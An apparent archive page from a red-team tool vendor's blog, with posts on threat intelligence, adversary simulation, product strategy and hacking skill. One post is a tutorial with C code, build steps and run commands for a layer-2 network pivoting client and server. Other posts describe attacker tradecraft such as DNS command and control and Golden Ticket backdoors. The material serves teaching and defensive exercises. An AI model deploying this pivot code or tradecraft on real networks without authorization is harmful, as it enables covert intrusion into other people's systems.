Archive for the ‘Uncategorized’ Category

h1

Audiences… or who I think I’m writing for

December 11, 2014

This is another meta-post about this blog. If you’re not a regular reader of this blog, this post is probably not for you. I’d like to share the different audiences I imagine when I write on this blog. Conveniently, the categories map quite well to audiences.

In the Metasploit Framework category I imagine that I’m writing to members of the Metasploit Framework community. I generally document the undocumented and share things I’ve learned digging deep into the framework here. My assumption is that if I find it interesting, others probably will too.

In the red team category I write a lot about my experiences supporting different cyber defense exercises. Once in a while, I delve into experiences from when I was penetration testing. This category is a mix of techniques and ideas about how to organize a red team. Earlier this year I had the opportunity to take part in a large-scale cyber war game run by folks I hadn’t worked with before. When I arrived, I found out that a big part of how I got there was this blog. Apparently, not enough people talk about how to scale large red teams and collaborate. Who knew?

In the Cobalt Strike category I announce new releases and I write about different Cobalt Strike features. This category is meant for Cobalt Strike’s users. I see my blog as an extension of the online training. I update the online course every two years. In between, this blog is my place to capture the thought process and tradecraft that goes with each new feature. If you want to keep up with the latest of what Cobalt Strike can do or where it’s going, this blog is the place to do it. Often times questions customers ask will end up as posts in this category too.

Once in a great while I make an attempt at writing reference pieces. These are my “What Penetration Testers Should Know” posts. I find these posts incredibly difficult to write. I usually stick these in the red team category. These posts have minimal marketing in them and usually appeal to a broad audience. I know when I want more traffic, I can sequester myself for a week to write one. Sadly, I don’t have many weeks where I can get away with this.

Some past posts:

I also occasionally write blog posts that document a technique and include source code. I think it’s important to continue to share code and knowledge with my peers. These posts are pretty difficult to write as well. The code I release in these contexts is usually meant as something for others to learn from, so I have to take my time to make it clear and document it.

Some past examples of these posts include:

And, finally, I’m starting to write blog posts on industry trends I see. I work with a lot of red teams and services firms through my Cobalt Strike product. These teams buy my product because there’s something they want to do with it. From this vantage point I see penetration testing evolving. The old way probably won’t go away, but I see new kinds of offensive services resonating well with customers. These posts are targeted at those who are championing these ideas within their organizations.

Here’s a few to look at along these lines:

And, that’s pretty much it. I published my post for this week and now I’m off the hook.

h1

When You Know Your Enemy

December 4, 2014

TL;DR This is my opinion on Threat Intelligence: Automated Defense using Threat Intelligence feeds is (probably) rebranded anti-virus. Threat Intelligence offers benefit when used to hunt for or design mitigations to defeat advanced adversaries. Blue teams that act on this knowledge have an advantage over that adversary and others that use similar tactics.

Threat Intelligence is one of those topics you either love to scoff at or embrace. In this post, I’ll share my hopes, dreams, and aspirations for the budding discipline of Threat Intelligence.

I define Threat Intelligence as actionable adversary-specific information to help you defend your network. There are several firms that sell threat intelligence. Each of these firms track, collect on, and produce reports and raw indicator information for multiple actors. What’s in these reports and how these companies collect their information depends on the company and the means and relationships at their disposal.

How to best get value from Threat Intelligence is up for debate and there are many theories and products to answer this question. The competing ideas surround what is actionable information and how you should use it.

Anti-virus Reborn as… Anti-virus

One theory for Threat Intelligence is to provide a feed with IP addresses, domain names, and file hashes for known bad activity. Customers subscribe to this feed, their network defense tools ingest it, and now their network is automatically safe from any actor that the Threat Intelligence provider reports on. Many technical experts scoff at this, and not without reason. This is not far off from the anti-virus model.

The above theory is NOT why I care about Threat Intelligence. My interest is driven by my admittedly skewed offensive experiences. Let me put you into my shoes for a moment…

I build hacking tools for a living. These tools get a lot of use at different Cyber Defense Exercises. Year after year, I see repeat defenders and new defenders. For some defenders, Cobalt Strike is part of their threat model. These teams know they need to defend against Cobalt Strike capability. They also know they need to defend against the Metasploit Framework, Dark Comet, and other common tools too. These tools are known. I am quick to embrace and promote alternate capabilities for this exact reason. Diversity is good for offense.

I have to live with defenders that have access to my tools. This forces me to come up with ways for my power users and I to stay ahead of smart defenders. It’s a fun game and it forces my tools to get better.

The low hanging fruit of Threat Intelligence makes little sense to me. As an attacker, I can change my IP addresses easily enough. I stand up core infrastructure, somewhere on the internet, and I use redirectors to protect my infrastructure’s location from network defenders. Redirectors are bounce servers that sit between my infrastructure and the target’s network. I also have no problem changing my hashes or the process I use to generate my executable and DLL artifacts. Cobalt Strike has thought out workflows for this.

I worry about the things that are harder to change.

Why is notepad.exe connecting to the Internet?

Each blue team will latch on to their favorite indicators. I remember one year many blue teams spoke of the notepad.exe malware. They would communicate with each other about the tendency for red team payloads to inject themselves into notepad.exe. This is a lazy indicator, originating from the Metasploit Framework and older versions of Cobalt Strike. It’s something a red operator can change, but few bother to do so. I would expect to see this type of indicator in the technical section of a Threat Intelligence report. This information would help a blue team get ahead of the red teams I worked with that year.

If you’d like to see how this is done, I recommend that you read J.J. Guy‘s case study on how to use Carbon Black to investigate this type of indicator.

Several blue teams worry about Cobalt Strike and its Beacon payload. This is my capability to replicate an advanced adversary. These teams download the trial and pick apart my tool to find indicators that they can use to find Beacon. These teams know they can’t predict my IP addresses, which attack I will use, or what file I will touch disk with. There are other ways to spot or mitigate an attacker’s favorite techniques.

DNS Command and Control

One place you can bring hurt to an attacker is their command and control. If you understand how they communicate, you can design mitigations to break this, or at least spot their activity with the fixed indicators in their communication. One of my favorite stories involves DNS.

Cobalt Strike has had a robust DNS communication capability since 2013. It’s had DNS beaconing since late 2012. This year, several repeat blue teams had strategies to find or defeat DNS C2. One team took my trial and figured out that parts of my DNS communication scheme were case sensitive. They modified their DNS server to randomly change the casing of all DNS replies and break my communication scheme.

This helped them mitigate red team activity longer than other blue teams. This is another example where information about your adversary can help. If you know there’s a critical weakness in your adversary’s toolchain, use that weakness to protect your network against it. This is not much different from spoofing a mutex value or changing a registry option to inoculate a network against a piece of malware.

This story doesn’t end there though. This team fixated on DNS and they saw it as the red team’s silver bullet. Once we proved we could use DNS, we put our efforts towards defeating the proxy restrictions each team had in place. We were eventually able to defeat this team’s proxy and we had another channel to work in their network. We used outbound HTTP requests through their restrictive proxy server to control a host and pivot to others. They were still watching for us over DNS. The lesson? Even though your Threat Intelligence offers an estimate of an adversary’s capability, don’t neglect the basics, and don’t assume that’s the way they will always hit you. A good adversary will adapt.

To Seek Out New Malware in New Processes…

After a National CCDC event, a student team revealed that they would go through each process and look for WinINet artifacts to hunt Beacon. This is beautiful on so many levels. I build technologies, like Malleable C2, to allow a red operator to customize their indicators and give my payload life, even when the payload is known by those who defend against it. This blue team came up with a non-changing indicator in my payload’s behavior. Fixed malware behavior or artifacts in memory are things a Threat Intelligence company can provide a client’s hunt team. These are tools to find the adversary.

It’s (not) always about the Malware

The red teams I work with quickly judge which teams are hard and which teams are not. We adjust our tradecraft to give harder teams a better challenge. There are a few ways we’ll do this.

Sometimes I know I can’t put malware on key servers. When this happens, I’ll try to live on the systems the defenders neglect. I then use configuration backdoors and trust relationships to keep access to the servers that are well protected. When I need to, I’ll use RDP or some other built-in tool to work with the well protected server. In this way, I get what I need without alerting the blue team to my activity. Malware on a target is not a requirement for an attacker to accomplish their goal.

CrowdStrike tracks an actor they call DEEP PANDA. This actor uses very similar tradecraftIf a blue team knew my favored tradecraft and tricks in these situations, they could instrument their tools and scripts to look for my behavior.

A few points…

You may say, that’s one adversary. What about the others? There are several ways to accomplish offensive tasks and each technique has its limitations (e.g., DNS as a channel). If you mitigate or detect a tactic, you’ll likely affect or find other adversaries that use that tactic too. If an adversary comes up with something novel and uses it in the wild, Threat Intelligence is a way to find out about it, and stay ahead of advancing adversary tradecraft. Why not let the adversary’s offensive research work for you?

You may also argue that your organization is still working on the basics. They’re not ready for this. I understand. These concepts are not for every organization. If you have a mature intrusion response capability, these are ideas about how Threat Intelligence can make it better. These concepts are a complement to, not a replacement for, the other best practices in network defense.

And…

You’ll notice that I speak favorably of Threat Intelligence and its possibilities. I read the glossy marketing reports these vendors release to tease their services. The information in the good reports isn’t far off from the information blue teams use to understand and get an edge in different Cyber Defense Exercises.

In each of these stories, you’ll notice a common theme. The red team is in the network or will get in the network (Assume Compromise!). Knowledge of the red actor’s tools AND tradecraft helps the blue teams get an advantage. These teams use their adversary knowledge in one of two ways: they either design a mitigation against that tactic or they hunt for the red team’s activity. When I look at Threat Intelligence, I see the most value when it aids a thinking blue operator in this way. As a red operator, this is where I’ve seen the most challenge.

Further Reading

  • Take a look at The Pyramid of Pain by David Bianco. This post discusses indicators in terms of things you deny the adversary. If you deny the adversary an IP address, you force them to take a routine action. If you deny the adversary use of a tool, you cause them a great deal of pain. David’s post is very much in the spirit of this one. Thanks to J.J. Guy for the link.

 

h1

My Constraint-based Product Strategy

November 26, 2014

When I work on a project, I like to define a broad problem statement. This is the project’s intended mark on the world. I don’t have enough hubris to claim a solution for all cases. To make my project’s tractable, I define assumptions. These assumptions bound the problem statement and keep the work under control. I tend to live within my assumptions until I feel the project has outgrown them. When this happens, I look for an opportunity to redefine my work under a new problem statement or at least, new assumptions.

In this blog post, I’ll take you through the problem statements and assumptions that define Armitage and Cobalt Strike. It’s fitting that I write this now, because I’m re- examining Cobalt Strike’s problem statement and assumptions.

Armitage

Armitage is a scriptable user interface for the Metasploit Framework that allows red teams to collaborate. Armitage has a broad problem statement: how do I help red teams collaborate?

Armitage lives under a set of assumptions.

First, I had to define a use case for this project. I opted to scope Armitage’s use case to exercise red teams, particularly red teams for the Collegiate Cyber Defense Competitions, which I had a lot of volunteer involvement with.

Next, I scoped Armitage to the Metasploit Framework only. I had zero intention of building the one collaboration framework to rule them all. I wanted to explore some ideas within the context of the Metasploit Framework and what it offers. This meant I would not integrate third-party hacking tools with Armitage and I would not build new hacking capability into it. These assumptions gave me suitable constraints to build and reason about Armitage.

This weekend, Armitage will celebrate its fourth birthday. I continue to maintain this project, but Armitage was successful in its original efforts a long time ago. Today, most penetration testing and red team platforms have collaboration features. Armitage is a familiar face at events where hackers have to work together with the Metasploit Framework. We now have good  practices [1, 2, 3, 4] to organize red teams in cyber defense exercises.

Cobalt Strike

I used to work on a red team support contract. Stealth and evasion mattered a great deal. I ran into the limitations of available tools. I saw a need for penetration testing tools to challenge harder targets. My work on these problems became Cobalt Strike. I define Cobalt Strike’s problem set as closing the gap between penetration testing tools and so-called advanced threat capabilities. It’s in my logo even! “Advanced Threat Tactics for Penetration Testers”. 

Like Armitage, Cobalt Strike lives under a set of assumptions too.

Every feature I build into Cobalt Strike requires synergy with a stock instance of the Metasploit Framework. This assumption led to a collection of tools very focused on the Windows attack surface. Some of Cobalt Strike’s concepts would be right at home with a MacOS X target, but there’s too little opportunity for synergy with the Metasploit Framework, so I haven’t looked in this direction. My emphasis on 32-bit payloads, also comes from this assumption.

Second, Cobalt Strike is made for a hypothetical internal red team for a large corporate or government enterprise. This assumption has had major influences on my product. It defines the problems I care about and the things I ignore. Let’s use browser pivoting as an example. This technology was made to meet a need for a segment of users. These users care about Internet Explorer, not Google Chrome or Firefox. Hence, browser pivoting was made for Internet Explorer.

Third, Cobalt Strike is built for a remote operations use case. This influences the problems I work on as well. I assume that my user is a remote actor. This is why I provide covert communication options and focus on ways to evade egress restrictions. Under my assumptions, if a user can’t get out, they can’t use the rest of the toolset. This assumption also limits the features I build and the workflows I support. If a tactic isn’t practical for a remote actor, I ignore it.

My last assumption relates to what Cobalt Strike does. Cobalt Strike executes targeted attacks and replicates advanced threats. That statement is marketing speak for sends phishing emails and focuses on post exploitation. I wrote the last sentence, tongue-in-cheek, but there’s a reality to it. My tool supports a process: setup a client-side attack, phish to get a foothold, abuse trusts for lateral movement, and conduct post exploitation to achieve some objective/demonstrate risk. I focus on this process and work to make this tool better support it. Few engagements execute this process end-to-end, so I make sure to decouple these pieces from each other.  That said, this clear definition of what Cobalt Strike does helps guide my development efforts.

Cobalt Strike has nearly two and a half years on the market and it’s had a lot of updates in that time. I still have work to do within Cobalt Strike’s problem set, but I feel it’s a good product for its stated use cases.

What’s next?

I’m thinking a lot about Cobalt Strike’s next iteration. At this time, I’m revisiting Cobalt Strike’s problem statement and assumptions. As I think about what’s coming next, here are a few things at the top of my mind:

First, I believe there’s a “good enough” level for hacker capability. After a point, better malware and capability will only take a red team so far. I see several needs that I categorize as features to support assessors with growing accountability and story telling requirements. This is a sign that some security programs are maturing and these customers expect more detail from us. I think there’s a need to put equal effort into these requirements.

I also believe we’re witnessing the emergence of a service that most penetration testers and red teams will soon offer. These are assessments that assume compromise and focus on an organization’s post-compromise security posture. Particularly, the organization’s ability to detect and remediate a sophisticated intruder. I wrote about this in a previous blog post.

Finally, I believe the deprecation of Windows XP was the end of an era. There are ideas and concepts in our tools and services that date back to the beginning of this era. I think some of these things are holding us back.

I’m not ready to speak specifics on these things yet, but I’m closely examining my tradecraft, process, and tools. I’m asking the hard questions: what’s historic baggage? What makes sense for the red team and adversary simulation use cases going forward?

h1

Adversary Simulation Becomes a Thing…

November 12, 2014

There is a growing chorus of folks talking about simulating targeted attacks from known adversaries as a valuable security service.

The argument goes like this: penetration testers are vulnerability focused and have a toolset/style that replicates a penetration tester. This style finds security problems and it helps, but it does little to prepare the customer for the targeted attacks they will experience.

Adversary simulation is different. It focuses on the customer’s ability to deal with an attack, post-compromise. These assessments look at incident response and provide a valuable “live fire” training opportunity for the analysts who hunt for and respond to incidents each day.

The organizations that buy security products and services are starting to see that compromise is inevitable. These organizations spend money on blinky boxes, people, services, and processes to deal with this situation. They need a way to know whether or not this investment is effective. Adversary simulation is a way to do this.

What is adversary simulation?

There’s no standard definition for adversary simulation, yet. It doesn’t even have an agreed upon term. I’ve heard threat emulationpurple teaming, and attack simulation to discuss roughly the same concept. I feel like several of us are wearing blindfolds, feeling around our immediate vicinity, and we’re working to describe an elephant to each other.

From the discussions on this concept, I see a few common elements:

The goal of adversary simulation is to prepare network defense staff for the highly sophisticated targeted attacks their organization may face.

Adversary simulation assumes compromise. The access vector doesn’t matter as much as the post-compromise actions. This makes sense to me. If an adversary lives in your network for years, the 0-day used three years ago doesn’t really matter. Offensive techniques, like the Golden Ticket, turn long-term persistence on its head. An adversary may return to your network and resume complete control of your domain at any time. This is happening.

Adversary simulation is a white box activity, sometimes driven by a sequence of events or a story board. It is not the goal of an adversary simulation exercise to demonstrate a novel attack path. There are different ways to come up with this sequence of events. You could use a novel attack from a prior red team assessment or real-world intrusion. You could also host a meeting to discuss threat models and derive a plausible scenario from that.

There’s some understanding that adversary simulation involves meaningful network and host-based indicators. These are the observables a network defense team will use to detect and understand the attacker. The simulated indicators should allow the network defense team to exercise the same steps they would take if they had to respond to the real attacker. This requires creative adversary operators with an open mind about other ways to hack. These operators must learn the adversary’s tradecraft and cobble together something that resembles their process. They must pay attention to the protocols the adversary uses, the indicators in the communication, the tempo of the communication, and whether or not the actor relies on distributed infrastructure. Host-based indicators and persistence techniques matter too. The best training results will come from simulating these elements very closely.

Adversary simulation is inherently cooperative. Sometimes, the adversary operator executes the scenario with the network defense team present. Other times the operator debriefs after all of the actions are executed. In both cases, the adversary operators give up their indicators and techniques to allow the network defense team to learn from the experience and come up with ways to improve their process. This requirement places a great burden on an adversary simulation toolkit. The adversary operators need ways to execute the same scenario with new indicators or twists to measure improvement.

Hacking to get Caught – A Concept for Adversary Replication and Penetration Testing

Threat Models that Exercise your SIEM and Incident Response

Comprehensive testing Red and Blue Make Purple

Seeing purple hybrid security teams for the enterprise

Isn’t this the same as red teaming?

I see a simulated attack as different from a red team or full scope assessment. Red Team assessments exercise a mature security program in a comprehensive way. A skilled team conducts a real-world attack, stays in the network, and steals information. At the end, they reveal a (novel?) attack path and demonstrate risk. The red team’s report becomes a tool to inform decision makers about their security program and justify added resources or changes to the security program.

A useful full scope assessment requires ample time and they are expensive.

Adversary simulation does not have to be expensive or elaborate. You can spend a day running through scenarios once each quarter. You can start simple and improve your approach as time goes on. This is an activity that is accessible to security programs with different levels of budget and maturity.

How does this relate to Cyber Defense Exercises?

I participate in a lot of Cyber Defense Exercises. Some events are setup as live-fire training against a credible simulated adversary. These exercises are driven off of a narrative and the red team executes the actions the narrative requires. The narrative drives the discussion post-action. All red team activities are white box, as the red team is not the training audience. These elements make cyber defense exercises very similar to adversary simulation as I’m describing here. This is probably why the discussion perks up my ears, it’s familiar ground to me.

There are some differences though.

These exercises don’t happen in production networks. They happen in labs. This introduces a lot of artificiality. The participants don’t get to “train as they fight” as many tools and sensors they use at home probably do not exist in the lab. There is also no element of surprise to help the attacker. Network defense teams come to these events ready to defend. These events usually involve multiple teams which creates an element of competition. A safe adversary simulation, conducted on a production network, does not need to suffer from these drawbacks.

Why don’t we call it “Purple Teaming”?

Purple Teaming is a discussion about how red teams and blue teams can work together. Ideas about how to do this differ. I wouldn’t refer to Adversary Simulation as Purple Teaming. You could argue that Adversary Simulation is a form of Purple Teaming. It’s not the only form though. Some forms of purple teaming have a penetration tester sit with a network defense team and dissect penetration tester tradecraft. There are other ways to hack beyond the favored tricks and tools of penetration testers.

Let’s use lateral movement as an example:

A penetration tester might use Metasploit’s PsExec to demonstrate lateral movement, help a blue team zero in on this behavior, and call it a day. A red team member might drop to a shell and use native tools to demonstrate lateral movement, help a blue team understand these options, and move on.

An adversary operator tasked to replicate the recent behavior of “a nation-state affiliated” actor might load a Golden Ticket into their session and use that trust to remotely setup a sticky keys-like backdoor on targets and control them with RDP. This is a form of lateral movement and it’s tied to an observed adversary tactic. The debrief in this case focuses on the novel tactic and potential strategies to detect and mitigate it.

Do you see the difference? A penetration tester or red team member will show something that works for them. An adversary operator will simulate a target adversary and help their customer understand and improve their posture against that adversary. Giving defenders exposure and training on tactics, techniques, and procedures beyond the typical penetration tester’s arsenal is one of the reasons adversary simulation is so important.

What are the best practices for Adversary Simulation?

Adversary Simulation is a developing area. There are several approaches and I’m sure others will emerge over time…

Traffic Generation

One way to simulate an adversary is to simulate their traffic on the wire. This is an opportunity to validate custom rules and to verify that sensors are firing. It’s a low-cost way to drill intrusion response and intrusion detection staff too. Fire off something obvious and wait to see how long it takes to detect it. If they don’t, you immediately know you have a problem.

Marcus Carey’s vSploit is an example of this approach. Keep an eye on his FireDrill.me company, as he’s expanding upon his original ideas as well.

DEF CON 19 – Metasploit vSploit Modules

Use Known Malware

Another approach is to use public malware on your customer’s network. Load up DarkComet, GhostRAT, or Bifrost and execute attacker-like actions. Of course, before you use this public malware, you have to audit it for backdoors and make sure you’re not introducing an adversary into your network. On the bright side, it’s free.

This approach is restrictive though. You’re limiting yourself to malware that you have a full toolchain for [the user interface, the c2 server, and the agent]. This is also the malware that off-the-shelf products will catch best. I like to joke that some anti-APT products catch 100% APT, so long as you limit your definition of APT malware to Dark Comet.

This is probably a good approach with a new team, but as the network security monitoring team matures, you’ll need better capability to challenge them and keep their interest.

Use an Adversary Simulation Tool

Penetration Testing Tools are NOT adequate adversary simulation tools. Penetration Testing Tools usually have one post-exploitation agent with limited protocols and fixed communication options. If you use a penetration testing tool and give up its indicators, it’s burned after that. A lack of communication flexibility and options makes most penetration testing tools poor options for adversary simulation.

Cobalt Strike overcomes some of these problems. Cobalt Strike’s Beacon payload does bi-directional communication over named pipes (SMB), DNS TXT records, DNS A records, HTTP, and HTTPS. Beacon also gives you the flexibility to call home to multiple places and to vary the interval at which it calls home. This allows you to simulate an adversary that uses asynchronous bots and distributed infrastructure.

The above features make Beacon a better post-exploitation agent. They don’t address the adversary replication problem. One difference between a post-exploitation agent and an adversary replication tool is user-controlled indicators. Beacon’s Malleable C2 gives you this. Malleable C2 is a technology that lets you, the end user, change Beacon’s network indicators to look like something else. It takes two minutes to craft a profile that accurately mimics legitimate traffic or other malware. I took a lot of care to make this process as easy as possible.

Malleable Command and Control

Cobalt Strike isn’t the only tool with this approach either. Encripto released Maligno, a Python agent that downloads shellcode and injects it into memory. This agent allows you to customize its network indicators to provide a trail for an intrusion analyst to follow.

Malleable C2 is a good start to support adversary simulation from a red team tool, but it’s not the whole picture. Adversary Simulation requires new story telling tools, other types of customizable indicators, and it also requires a rethink of workflows for lateral movement and post-exploitation. There’s a lot of work to do yet.

Putter Panda – Threat Replication Case Study

Will Adversary Simulation work?

I think so. I’d like to close this post with an observation, taken across various exercises:

In the beginning, it’s easy to challenge and exercise a network defense team. You will find that many network defenders do not have a lot of experience (actively) dealing with a sophisticated adversary. This is part of what allows these adversaries the freedom to live and work on so many networks. An inability to find these adversaries creates a sense of complacency. If I can’t see them, maybe they’re not there?

By exercising a network defense team and providing actionable feedback with useful details, you’re giving that team a way to understand their level. The teams that take the debrief seriously will figure out how to improve and get better.

Over time, you will find that these teams, spurred by your efforts, are operating at a level that will challenge your ability to create a meaningful experience for them. I’ve provided repeat red team support to many events since 2011. Each year I see the growth of the return teams that my friends and I provide an offensive service to. It’s rewarding work and we see the difference.

Heed my words though: the strongest network defense teams require a credible challenge to get better. Without adversary simulation tools [built or bought], you will quickly exhaust your ability to challenge these teams and keep up with their growth.

h1

How VPN Pivoting Works (with Source Code)

October 14, 2014

A VPN pivot is a virtual network interface that gives you layer-2 access to your target’s network. Rapid7’s Metasploit Pro was the first pen testing product with this feature. Core Impact has this capability too.

In September 2012, I built a VPN pivoting feature into Cobalt Strike. I revised my implementation of this feature in September 2014. In this post, I’ll take you through how VPN pivoting works and even provide code for a simple layer-2 pivoting client and server you can play with. The layer-2 pivoting client and server combination don’t have encryption, hence it’s not correct to refer to them as VPN pivoting. They’re close enough to VPN pivoting to benefit this discussion though.

https://github.com/rsmudge/Layer2-Pivoting-Client

The VPN Server

Let’s start with a few terms: The attacker runs VPN server software. The target runs a VPN client. The connection between the client and the server is the channel to relay layer-2 frames.

To the attacker, the target’s network is available through a virtual network interface. This interface works like a physical network interface. When one of your programs tries to interact with the target network, the operating system will make the frames it would drop onto the wire available to the VPN server software. The VPN server consumes these frames, relays them over the data channel to the VPN client. The VPN client receives these frames and dumps them onto the target’s network.

Here’s what the process looks like:

vpnserver

The TAP driver makes this possible. According to its documentation, the TUN/TAP provides packet reception and transmission for user space programs. The TAP driver allows us to create a (virtual) network interface that we may interact with from our VPN server software.

Here’s the code to create a TAP [adapted from the TUN/TAP documentation]:

#include <linux/if.h>
#include <linux/if_tun.h>

int tun_alloc(char *dev) {
	struct ifreq ifr;
	int fd, err;

	if( (fd = open("/dev/net/tun", O_RDWR)) < 0 )
		return tun_alloc_old(dev);

	memset(&ifr, 0, sizeof(ifr));
	ifr.ifr_flags = IFF_TAP | IFF_NO_PI; 

	if( *dev )
		strncpy(ifr.ifr_name, dev, IFNAMSIZ);

	if( (err = ioctl(fd, TUNSETIFF, (void *) &ifr)) < 0 ) {
		close(fd);
		return err;
	}

	strcpy(dev, ifr.ifr_name);
	return fd;
}

This function allocates a new TAP. The dev parameter is the name of our interface. This is the name we will use with ifconfig and other programs to configure it. The number it returns is a file descriptor to read from or write to the TAP.

To read a frame from a TAP:

int totalread = read(tap_fd, buffer, maxlength);

To write a frame to a TAP:

write(tap_fd, buffer, length);

These functions are the raw ingredients to build a VPN server. To demonstrate tunneling frames over layer 2, we’ll take advantage of simpletun.c by Davide Brini.

simpletun.c is an example of using a network TAP. It’s ~300 lines of code that demonstrates how to send and receive frames over a TCP connection. This GPL(!) example accompanies Brini’s wonderful Tun/Tap Interface Tutorial. I recommend that you read it.

When simpletun.c sends a frame, it prefixes the frame with an unsigned short in big endian order. This 2-byte number, N, is the length of the frame in bytes. The next N bytes are the frame itself. simpletun.c expects to receive frames the same way.

To build simpletun:

gcc simpletun.c -o simpletun

Note: simpletun.c allocates a small buffer to hold frame data. Change BUFSIZE on line 42 to a higher value, like 8192. If you don’t do this, simpletun.c will eventually crash. You don’t want that.

To start simpletun as a server:

./simpletun -i [interface] -s -p [port] -a

The VPN Client

Now that we understand the VPN server, let’s discuss the VPN pivoting client. Cobalt Strike’s VPN pivoting client sniffs traffic on the target’s network. When it sees frames, it relays them to the VPN pivoting server, which writes them to the TAP interface. This causes the server’s operating system to process the frames as if they were read off of the wire.

vpnclient

Let’s build a layer-2 pivoting client that implements similar logic. To do this, we will use the Windows Packet Capture API. WinPcap is the Windows implementation of  LibPCAP and RiverBed Technology maintains it.

First, we need to open up the target network device that we will pivot onto. We also need to put this device into promiscuous mode. Here’s the code to do that:

pcap_t * raw_start(char * localip, char * filterip) {
	pcap_t * adhandle   = NULL;
	pcap_if_t * d       = NULL;
	pcap_if_t * alldevs = NULL;
	char errbuf[PCAP_ERRBUF_SIZE];

	/* find out interface */
	d = find_interface(&alldevs, localip);

	/* Open the device */
	adhandle = (pcap_t *)pcap_open(d->name, 65536, PCAP_OPENFLAG_PROMISCUOUS | PCAP_OPENFLAG_NOCAPTURE_LOCAL, 1, NULL, errbuf);
	if (adhandle == NULL) {
		printf("\nUnable to open the adapter. %s is not supported by WinPcap\n", d->name);
		return NULL;
	}

	/* filter out the specified host */
	raw_filter_internal(adhandle, d, filterip, NULL);

	/* ok, now we can free out list of interfaces */
	pcap_freealldevs(alldevs);

	return adhandle;
}

Next, we need to connect to the layer-2 pivoting server and start a loop that reads frames and sends them to our server. I do this in raw.c. Here’s the code to ask WinPcap to call a function when a frame is read:

void raw_loop(pcap_t * adhandle, void (*packet_handler)(u_char *, const struct pcap_pkthdr *, const u_char *)) {
	pcap_loop(adhandle, 0, packet_handler, NULL);
}

The packet_handler function is my callback to respond to each frame read by WinPCAP. It writes frames to our layer-2 pivoting server. I define this function in tunnel.c.

void packet_handler(u_char * param, const struct pcap_pkthdr * header, const u_char * pkt_data) {
	/* send the raw frame to our server */
	client_send_frame(server, (void *)pkt_data, header->len);
}

I define client_send_frame in client.c. This function writes the frame’s length and data to our layer-2 pivoting server connection. If you want to implement a new channel or add encryption to make this a true VPN client, client.c is the place to explore this.

We now know how to read frames and send them to the layer-2 pivoting server.

Next, we need logic to read frames from the server and inject these onto the target network. In tunnel.c, I create a thread that calls client_recv_frame in a loop. The client_recv_frame function reads a frame from our connection to the layer-2 server. The pcap_sendpacket function injects a frame onto the wire.

DWORD ThreadProc(LPVOID param) {
	char * buffer = malloc(sizeof(char) * 65536);
	int len, result;
	unsigned short action;

	while (TRUE) {
		len = client_recv_frame(server, buffer, 65536);

		/* inject the frame we received onto the wire directly */
		result = pcap_sendpacket(sniffer, (u_char *)buffer, len);
		if (result == -1) {
			printf("Send packet failed: %d\n", len);
		}
	}
}

This logic is the guts of our layer-2 pivoting client. The project is ~315 lines of code and this includes headers. Half of this code is in client.c which is an abstraction of the Windows Socket API. I hope you find it navigable.

To run the layer-2 pivoting client:

client.exe [server ip] [server port] [local ip]

Once the layer-2 client connects to the layer-2 server, use a DHCP client to request an IP address on your attack server’s network interface [or configure an IP address with ifconfig].

Build Instructions

I’ve made the source code for this simple Layer-2 client available under a BSD license. You will need to download the Windows PCAP Developer Pack and extract it to the folder where the layer-2 client lives. You can build the layer-2 client on Kali Linux with the included Minimal GNU for Windows Cross Compiler. Just type ‘make’ in its folder.

Deployment

To try this Layer-2 client, you will need to install WinPcap on your target system. You can download WinPcap from RiverBed Technology. And, that’s it. I hope you’ve enjoyed this deep dive into VPN pivoting and how it works.

The layer-2 client is a stripped down version of Cobalt Strike’s Covert VPN feature. Covert VPN compiles as a reflective DLL. This allows Cobalt Strike to inject it into memory. The Covert VPN client and server encrypt the VPN traffic [hence, VPN pivoting]. Covert VPN will also silently drop a minimal WinPcap install and clean it up for you. And, Covert VPN supports multiple data channels. It’ll tunnel frames over TCP, UDP, HTTP, or through Meterpreter.

h1

The #1 Trait of a Successful Hacker

May 8, 2014

For some people, programming comes naturally to them. For others, it’s a struggle or something that doesn’t click with the way they think. The same thing with hacking.

Hackers often complain about “script kiddies”, people who use tools without any clue about what they do. What’s the difference between someone who will become a good hacker and someone who will stay a script kiddie, forever?

I know the answer. Here it is.  The number one trait for a successful hacker is the ability to reason about things one can’t directly observe.

Since a hacker is in the business of circumventing controls or discovering the unknown, they’re constantly in the blind. They have to reason about what they’re trying to hack though. If they can’t, they’ll never figure out the system they’re working on.

This innate ability to reason comes from a solid mental model. A mental model is your ability to quickly ask a question and have several guesses at an answer. When someone asks me a question, sometimes I have a few ideas. Other times I’m stuck. I’m stuck when I have no reference for the situation as described to me. Sometimes, I’m stuck because there are too many possibilities and I don’t have enough information to pick one. This is how I feel when with 99% of the Armitage “support requests” I get.

Where does a mental model come from? A mental model comes from knowing how something works. Reading, attending classes, and otherwise consuming information provide some of the pieces of a mental model, but inactive learning, by itself, will not build a mental model for you. To create a mental model, you have to do something active with these pieces. This active piece requires envisioning an outcome or goal, attempting it, failing, figuring out why, and going on to eventually succeed with the task. There’s an emotion that goes with this active learning process. It’s called frustration.

If you’re frustrated at different times while you’re learning or doing, but you still get the job done, then congratulations–you’re building your mental model.

When I was working on the browser pivoting feature for Cobalt Strike, I had the benefit of an unexpected learning experience. My proxy server would process a request, send a response, and close the socket. In local testing, this worked perfectly. When I used a port forward through Meterpreter, it would work most of the time.  When I tried to browser pivot with Meterpreter tunneled through Cobalt Strike’s Beacon connected to Amazon’s EC2–requests failed 90% of the time.

What happened? Why was it failing? I could have thrown up my hands and said “it doesn’t work” or “this lousy performance is acceptable”. I went through each component of my system and tried to understand it. Eventually, I figured out that my call to closesocket would make a best effort to finish sending data in the socket’s outbound queue. Usually, this worked fine. As I introduced latency into my pivoting process, I increased the opportunity for data to get discarded. Before I released this feature, I was able to solve this problem.

This frustrating experience improved my mental model. I couldn’t just look at my code to solve the problem. I had to setup experiments and reason about parts of the system I didn’t write or have full knowledge of.

If you want to succeed as a hacker, learn to troubleshoot. Learn how the things around you work. If you can’t directly observe a detail, learn how to get the answer another way. If you run out of ideas, keep digging. The answer is out there.

h1

Meat and Potatoes

April 17, 2014

I’m well over 100 posts into this blog now. Wow! I’ve had several blogs in the past, but this is one of the few I’ve had a consistent run with. The other was the After the Deadline blog, which gets fewer updates since I left the project.

After 100 posts, I feel it’s time to capture what this blog is about and what I hope it says to you. It’s probably no surprise, but this is the “official” blog for Strategic Cyber LLC, which is my company and my full-time occupation. I get asked “what else do you do?” a lot. I want to make it crystal clear that this business has and has had my full-time focus for the past two and a half years.

